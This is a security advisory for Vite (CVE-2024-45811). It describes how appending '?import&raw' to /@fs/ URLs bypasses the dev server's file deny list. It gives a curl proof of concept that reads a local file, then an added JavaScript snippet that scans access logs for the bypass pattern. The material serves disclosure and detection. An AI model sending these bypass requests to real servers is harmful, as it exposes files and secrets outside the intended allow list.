Security Advisories

CGA-2rrm-cfwm-848j

Published

Last updated

https://images.chainguard.dev/security/CGA-2rrm-cfwm-848j
Package

vite

Latest Update
Fixed
Fixed Version

5.4.6-r0

Aliases
  • CVE-2024-45811
  • GHSA-9cwx-2883-4wfx

Severity

5.3

Medium

CVSS V3

Summary

Vite's server.fs.deny is bypassed when using ?import&raw

Description

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of the Vite serving allow list. Adding ?import&raw to the URL bypasses this restriction and returns the file's content if the file exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
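
Where requests to the dev server are logged (for example by a reverse proxy in front of it), the request pattern from the PoC can be searched for during triage. The following is an added example, not part of the advisory or of Vite: it assumes combined-log-style lines and the default /@fs/ prefix, matches the two query flags in any order, and its log lines and function names are constructed for illustration.

```javascript
// Added example (not from the advisory or Vite). Log lines are constructed
// samples in combined-log style; the default /@fs/ prefix is assumed.
const SAMPLE_LOG = [
  '127.0.0.1 - - [01/Jan/2025:10:00:00 +0000] "GET /@fs/tmp/secret.txt HTTP/1.1" 403 210',
  '127.0.0.1 - - [01/Jan/2025:10:00:01 +0000] "GET /@fs/tmp/secret.txt?import&raw HTTP/1.1" 200 96',
  '127.0.0.1 - - [01/Jan/2025:10:00:02 +0000] "GET /src/logo.svg?import HTTP/1.1" 200 512',
  '127.0.0.1 - - [01/Jan/2025:10:00:03 +0000] "GET /@fs/tmp/secret.txt?raw&import HTTP/1.1" 200 96',
  '127.0.0.1 - - [01/Jan/2025:10:00:04 +0000] "GET /@fs/tmp/secret.txt?import&raw HTTP/1.1" 403 210',
];

// Extract request target and status from one access-log line.
const LINE_RE = /"(?:GET|HEAD) (\S+) HTTP\/[\d.]+" (\d{3})/;

function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  try {
    // The base is only there so a path-only target can be parsed.
    const url = new URL(m[1], 'http://placeholder.invalid');
    return { path: url.pathname, params: url.searchParams, status: Number(m[2]) };
  } catch {
    return null; // malformed request target
  }
}

// True for an /@fs/ request carrying both flags, in any order and with or
// without values (?import=&raw= parses the same as ?import&raw).
function isFsRawImport(req) {
  return req.path.startsWith('/@fs/') && req.params.has('import') && req.params.has('raw');
}

// Return one record per matching request; `served` marks a 200 response,
// i.e. a case where file content may have been returned.
function findFsRawImports(lines) {
  const hits = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (req && isFsRawImport(req)) {
      hits.push({ path: req.path, status: req.status, served: req.status === 200 });
    }
  }
  return hits;
}

console.log(findFsRawImports(SAMPLE_LOG));
```

A hit with served set to true against a dev server running a package older than the fixed version is worth reviewing to see which file the path points to.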
